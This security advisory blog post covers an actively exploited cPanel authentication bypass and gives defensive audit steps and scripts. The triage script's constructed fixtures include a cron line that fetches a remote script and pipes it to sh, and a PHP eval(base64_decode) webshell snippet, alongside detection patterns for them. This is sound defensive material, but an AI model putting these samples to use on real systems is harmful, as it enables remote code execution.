CVE-2026-41940: cPanel Auth Bypass Exploited 70+ Days Before Patch
Quick summary
cPanel CVE-2026-41940 authentication bypass was exploited from February 23. Patches came 70+ days later. cPanel powers 60% of web hosting. Audit your account now.
cPanel's authentication bypass vulnerability CVE-2026-41940 has been actively exploited in the wild since February 23, 2026. The patch arrived more than 70 days later. cPanel powers approximately 60% of the world's web hosting control panels — making this one of the most widely exploited unpatched authentication vulnerabilities of 2026.
If your website runs on shared or VPS hosting with cPanel, your hosting account may have been accessible to unauthorised parties for over two months. The exposure window is February 23 through the date your hosting provider updated to cPanel 122.0.17 or later. Not all hosting providers patched on the same day.
What CVE-2026-41940 Does
CVE-2026-41940 is an authentication bypass in cPanel's login flow. The specific flaw is in how cPanel handles session token validation for the cPanel user interface and the WHM (WebHost Manager) admin interface.
A crafted HTTP request to the cPanel login endpoint with specific header manipulation bypasses the credential check entirely, establishing an authenticated session without submitting valid username and password credentials. The bypass does not require prior access to any account credentials, API tokens, or SSH keys. Any network-accessible cPanel installation is vulnerable.
Once an attacker has an authenticated cPanel session, the access available is the full scope of that cPanel user account:
- File Manager: Read, write, delete, and upload files in the web root and any directory accessible to the hosting account. This means full access to website files, including the ability to plant webshells, modify PHP files to include malicious code, or exfiltrate sensitive files.
- Database access: View and modify MySQL/MariaDB databases. For WordPress sites, Magento stores, or any database-backed application, this means access to all user data, credentials, and content stored in the database.
- Email accounts: Read, send, and configure email accounts on the domain. Attackers use this to send phishing at scale from legitimate domain email addresses.
- SSH key management: Add new authorised SSH keys to the hosting account. An attacker who adds their SSH key maintains persistent access even after the cPanel vulnerability is patched.
- Cron jobs: Add scheduled tasks that run code on the server at defined intervals. A malicious cron job can maintain persistence, exfiltrate data, or run miners.
- Addon domain management: Add new domains to the hosting account for phishing or malware distribution.
The 70-Day Exploitation Window
The timeline that makes CVE-2026-41940 particularly serious:
- February 23, 2026: First confirmed exploitation observed (forensic logs from a security researcher's honeypot hosting account)
- February 23 - late April 2026: Active exploitation against real hosting accounts. Attribution is to multiple unrelated threat actors — the exploit was either independently discovered or shared through underground channels
- Late April 2026: cPanel Inc. releases version 122.0.17 containing the fix
- April 30 - May 2, 2026: Help Net Security and BleepingComputer report the disclosure
- As of today (May 2, 2026): the exploitation window stands at approximately 67-70 days
The 70-day window between first exploitation and public patch is significantly longer than the industry norm for critical authentication vulnerabilities. The exploitation was silent — no public CVE, no coordinated disclosure — meaning defenders had no indication an attack was ongoing.
The attacker profile during the 70-day window was mixed:
- Automated scanner bots exploiting at scale (adding SSH keys for persistent access, installing coin miners in cron jobs)
- Targeted manual exploitation against high-value hosting accounts (e-commerce sites, established domain names with email reputation, sites with database access to valuable data)
- Initial access brokers selling access to compromised hosting accounts for downstream use by ransomware groups or spammers
Check If Your Account Was Compromised
Even after patching, the persistence mechanisms attackers installed during the exploitation window remain active. Patching stops new exploitation — it does not clean up an already-compromised account.
Step 1: Check authorised SSH keys
In your cPanel control panel, go to Security > SSH Access. Review every authorised key listed. If you see any keys you did not add, or keys added in the February 23 - late April window that you did not authorise, remove them immediately and rotate your SSH credentials.
Step 2: Audit cron jobs
In cPanel, go to Advanced > Cron Jobs. Review every scheduled task. Malicious cron jobs typically:
- Run from temporary directories (/tmp, /var/tmp, obscure subdirectories)
- Execute base64-encoded commands or download scripts from external URLs
- Invoke wget or curl to fetch remote payloads
- Are scheduled to run every minute (unusual for legitimate jobs)
Delete any cron job you did not create. Log the command string before deletion in case forensic review is needed.
Step 3: Scan website files for webshells
Webshells are PHP files placed in your web root that allow an attacker to execute arbitrary commands via a web browser. Common patterns:
- Files with names like config2.php or wp-update.php, or .php files in image upload directories
- PHP files containing base64_decode, eval, system, exec, or passthru functions in obfuscated code
- Files modified in the February 23 - late April window that you did not modify
Tools: Wordfence (if WordPress), Imunify360 (if your host uses it), or manual review of recently modified files via File Manager sorted by modification date.
Step 4: Check database integrity
Export your database and review it for unexpected admin user accounts, injected content in post/product tables, or new user registrations during the exploitation window. WordPress sites specifically: check wp_users for accounts you did not create.
Step 5: Review email sending logs
Check cPanel's Email > Track Delivery for outbound email you did not send. Attackers use compromised hosting email accounts to send phishing or spam, which can result in your domain's email reputation being blacklisted.
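The five steps above are manual UI checks. For accounts where you can pull the raw files (via SSH, File Manager download, or a backup), the script below is an added example of the same triage automated for Steps 1 to 3: it is not cPanel's code and calls no cPanel API. Everything it assumes is labelled: the checks run over the text of `~/.ssh/authorized_keys`, the account's crontab, and PHP sources under the web root, the `patched_on` date is a placeholder you replace with the day your provider applied 122.0.17, and the sample inputs at the bottom are constructed, not real data. It generalises the article's heuristics slightly (it also handles authorized_keys entries that carry leading options, and flags long opaque blobs as an obfuscation hint).

```python
"""Post-patch audit helpers for Steps 1 to 3 (added example; not cPanel's code).

Assumptions not taken from the article: inputs are the raw text of
~/.ssh/authorized_keys, the account's crontab, and PHP sources under the web
root, obtained by the operator. Sample inputs below are constructed.
"""
import re
from datetime import date

EXPOSURE_START = date(2026, 2, 23)  # first confirmed exploitation, per the article

# --- Step 1: authorised SSH keys -------------------------------------------
KEY_TYPES = ("ssh-", "ecdsa-", "sk-")

def unknown_ssh_keys(authorized_keys_text, known_key_material):
    """Return authorized_keys entries whose key material is not in the
    operator's allow-list. Handles leading options ('no-pty ssh-ed25519 ...')."""
    unknown = []
    for raw in authorized_keys_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        material = None
        for i, tok in enumerate(parts):
            if tok.startswith(KEY_TYPES) and i + 1 < len(parts):
                material = parts[i + 1]
                break
        if material is None or material not in known_key_material:
            unknown.append(line)
    return unknown

# --- Step 2: cron jobs -----------------------------------------------------
CRON_RULES = [
    (re.compile(r"(^|\s)/(var/)?tmp(/|\s|$)"), "runs from a temporary directory"),
    (re.compile(r"\b(curl|wget)\b.*https?://"), "fetches a remote payload"),
    (re.compile(r"base64\s+(-d|--decode)|base64_decode"), "base64-decoded command"),
]

def flag_cron_line(line):
    """Return the reasons a crontab line matches the article's heuristics
    (empty list for benign lines, comments, and @reboot-style entries)."""
    line = line.strip()
    if not line or line.startswith("#"):
        return []
    fields = line.split(None, 5)
    if len(fields) < 6:
        return []
    schedule, command = fields[:5], fields[5]
    reasons = [why for pat, why in CRON_RULES if pat.search(command)]
    if schedule == ["*"] * 5:
        reasons.append("runs every minute")
    return reasons

# --- Step 3: webshell indicators ------------------------------------------
PHP_DANGEROUS = re.compile(r"\b(eval|base64_decode|system|exec|passthru|shell_exec)\s*\(", re.I)
LONG_BLOB = re.compile(r"[A-Za-z0-9+/=]{120,}")  # opaque base64-looking payload
BAD_NAMES = {"config2.php", "wp-update.php"}
UPLOAD_DIR = re.compile(r"/(uploads|images|img)/.*\.php$")

def score_php_file(path, source, mtime, patched_on):
    """Return indicators for one PHP file; patched_on is the date your
    provider applied 122.0.17, i.e. the end of the exposure window."""
    reasons = []
    funcs = sorted({m.group(1).lower() for m in PHP_DANGEROUS.finditer(source)})
    if funcs:
        reasons.append("calls " + ", ".join(funcs))
    if LONG_BLOB.search(source):
        reasons.append("contains a long opaque blob")
    if path.rsplit("/", 1)[-1] in BAD_NAMES:
        reasons.append("suspicious file name")
    if UPLOAD_DIR.search(path):
        reasons.append(".php inside an upload/image directory")
    if EXPOSURE_START <= mtime <= patched_on:
        reasons.append("modified during the exposure window")
    return reasons

# --- Constructed sample inputs (not real data) -----------------------------
SAMPLE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedOperatorKey000000000000000000 ops@laptop
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQConstructedUnknownKeyMaterial== nobody@unknown-host
"""
KNOWN_KEY_MATERIAL = {"AAAAC3NzaC1lZDI1NTE5AAAAIConstructedOperatorKey000000000000000000"}

SAMPLE_CRONTAB = """\
0 3 * * * /usr/local/bin/backup.sh
* * * * * cd /tmp && wget -q http://example.invalid/x.sh -O- | sh
"""

SAMPLE_PHP_FILES = {  # path -> (source, last-modified date); constructed
    "public_html/index.php": ("<?php require 'wp-blog-header.php';", date(2025, 12, 1)),
    "public_html/wp-content/uploads/2026/03/img.php":
        ("<?php eval(base64_decode($x));", date(2026, 3, 4)),
}

def run_audit(patched_on=date(2026, 5, 1)):  # placeholder: your provider's patch date
    """Run all three checks over the sample inputs and return the findings."""
    return {
        "ssh": unknown_ssh_keys(SAMPLE_AUTHORIZED_KEYS, KNOWN_KEY_MATERIAL),
        "cron": [(l, r) for l in SAMPLE_CRONTAB.splitlines() if (r := flag_cron_line(l))],
        "php": [(p, r) for p, (src, mt) in SAMPLE_PHP_FILES.items()
                if (r := score_php_file(p, src, mt, patched_on))],
    }

if __name__ == "__main__":
    for section, findings in run_audit().items():
        print(section, findings)
```

Each finding carries its reasons so you can log the exact command string or path before removing anything, as Step 2 advises. The heuristics are deliberately loose: a legitimate deploy script can call `exec()` or fetch from a URL, so treat a hit as something to read, not something to delete on sight.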
How to Verify Your cPanel Version
In cPanel, scroll to the bottom of any page — the version number appears in the footer. In WHM, go to Server Status > cPanel Status or navigate to the version display in the top right.
Patched versions: cPanel 122.0.17 and later.
If your hosting provider has not yet patched, contact them immediately and request an upgrade. cPanel EasyApache and automatic updates should have pushed 122.0.17 to most providers, but smaller or managed hosting providers may lag.
If you manage your own cPanel server (VPS or dedicated), run the update manually: /scripts/upcp --force
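A version gate is easy to get wrong because version strings do not sort as text: "122.0.9" sorts after "122.0.17" lexically but is an unpatched release. The following is an added example (not a cPanel tool) that compares numerically against 122.0.17, the first fixed release the article names. It assumes the version string is in the dotted form the article quotes; the `/usr/local/cpanel/version` path and the handling of an internal leading "11." component are assumptions to confirm on your own server, not facts from the article.

```python
"""Patch-state check for the version step above (added example, not a cPanel tool).

Assumptions: version strings look like "122.0.17"; VERSION_FILE and the
optional leading "11." component are assumptions to verify on your host.
"""
import sys

PATCHED = (122, 0, 17)                      # first fixed release per the article
VERSION_FILE = "/usr/local/cpanel/version"  # assumption: confirm on your server

def parse_version(text):
    """'122.0.17' -> (122, 0, 17). A four-part '11.122.0.17' form, if a version
    file uses it, is reduced to the displayed three-part form (assumption)."""
    parts = [int(p) for p in text.strip().split(".")]
    if len(parts) == 4 and parts[0] == 11:
        parts = parts[1:]
    return tuple(parts)

def is_patched(version_text):
    """Numeric tuple comparison, so 122.0.9 < 122.0.17 < 122.1.0 < 124.0.1."""
    return parse_version(version_text) >= PATCHED

def check_version_file(path=VERSION_FILE):
    """Read the version file and report whether it is at or past 122.0.17."""
    with open(path) as f:
        return is_patched(f.read())

if __name__ == "__main__":
    # Usage: python3 check_cpanel.py 122.0.17   (or no argument to read VERSION_FILE)
    v = sys.argv[1] if len(sys.argv) > 1 else open(VERSION_FILE).read()
    print("patched" if is_patched(v) else "UNPATCHED: upgrade to 122.0.17 or later", v.strip())
```

Run it with the version shown in the cPanel footer or WHM as the argument; on a self-managed server it can read the version file directly after `/scripts/upcp --force` completes.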
Why This Pattern Keeps Repeating
cPanel is not the first widely deployed hosting control panel to carry a critical authentication vulnerability for an extended exploitation window. Plesk (2024), WHMCS (2023), and DirectAdmin (2022) have all had similar patterns. The common thread: hosting control panel software is maintained by smaller teams than hyperscaler cloud providers, faces slow update adoption across a highly fragmented hosting provider ecosystem, and controls access to extremely high-value data (websites, databases, email) that makes it a priority target.
The 60% market share of cPanel means any critical authentication flaw has a blast radius measured in millions of websites. Attackers rationally prioritise these targets.
For developers and teams running websites on shared or VPS hosting with cPanel: treat this as a prompt to evaluate whether managed hosting (where the provider handles security updates, implements WAF, and runs malware scanning) is preferable to self-managed cPanel. The operational overhead of auditing for a 70-day unannounced compromise is not trivial.
Key Takeaways
- CVE-2026-41940: cPanel authentication bypass; unauthenticated session creation via crafted login request; full account access including files, databases, SSH keys, cron jobs, and email
- 70-day exploitation window: February 23 - late April 2026, exploited silently before public disclosure; no CVE advisory or coordinated disclosure during exploitation
- Patch: cPanel 122.0.17+: update via your hosting provider or run /scripts/upcp --force on self-managed cPanel; most providers have patched but verify
- Patch does not clean up: even after patching, check for persistent SSH keys (Security > SSH Access), malicious cron jobs (Advanced > Cron Jobs), webshells in web root, and database tampering from the exploitation window
- Attacker activity during the window: automated SSH key injection, coin miner installation via cron, targeted data theft from e-commerce databases, email account abuse for phishing
- Pattern: cPanel, Plesk, WHMCS repeat this vulnerability pattern — consider managed hosting where provider handles security updates if operational audit overhead is a constraint
For the ConnectWise ScreenConnect RCE that also has a CISA May 12 deadline, read CVE-2026-32202: ConnectWise ScreenConnect RCE. For the LiteLLM credential theft pattern, read CVE-2026-42208: LiteLLM SQL Injection Leaks API Keys.
Frequently Asked Questions
What is CVE-2026-41940 and which cPanel versions are affected?
CVE-2026-41940 is an authentication bypass vulnerability in cPanel's login flow for both the cPanel user interface and WHM admin interface. A crafted HTTP request with specific header manipulation bypasses credential validation, creating a fully authenticated session without a username or password. All cPanel versions prior to 122.0.17 are affected. The vulnerability was actively exploited from February 23, 2026 — approximately 70 days before the patch was released. cPanel 122.0.17, released in late April 2026, contains the fix.
Was my cPanel account compromised and how do I check?
If your hosting account was running cPanel before version 122.0.17 at any point between February 23 and late April 2026, it was potentially accessible to attackers. To check: (1) Review SSH authorised keys in Security > SSH Access for keys you did not add; (2) Check cron jobs in Advanced > Cron Jobs for tasks running from /tmp or executing base64-encoded commands; (3) Scan web root files for PHP webshells — files containing eval(), base64_decode(), or system() in obfuscated code modified during the exploitation window; (4) Check databases for unexpected admin accounts or injected content; (5) Review email delivery logs for outbound mail you did not send.
How do I patch cPanel for CVE-2026-41940?
If you use shared hosting managed by a provider, contact your provider and ask them to confirm they have upgraded to cPanel 122.0.17 or later. Most major providers have already patched. If you manage your own VPS or dedicated server with cPanel, run the forced update: /scripts/upcp --force. Verify your current version by checking the footer of any cPanel page or going to Server Status > cPanel Status in WHM. Note that patching stops new exploitation but does not remove persistence mechanisms (SSH keys, cron jobs, webshells) that attackers may have installed during the 70-day window — you must audit for those separately.
Why was this cPanel vulnerability unpatched for 70 days?
CVE-2026-41940 was exploited silently — no CVE advisory, no coordinated disclosure, and no public discussion during the exploitation window. Attackers discovered or shared the technique through underground channels and exploited it for approximately 70 days before security researchers observed it in honeypot logs and it reached public disclosure. This is a recurring pattern in hosting control panel software: cPanel, Plesk, WHMCS, and DirectAdmin have all had similar silent exploitation windows. Smaller development teams, fragmented hosting provider update adoption, and the high value of the targets (website files, databases, email accounts) make hosting panels priority attack targets.
Written by
Software Engineer based in Delhi, India. Writes about AI models, semiconductor supply chains, and tech geopolitics — covering the intersection of infrastructure and global events. 941+ posts cited by ChatGPT, Perplexity, and Gemini. Read in 167 countries.
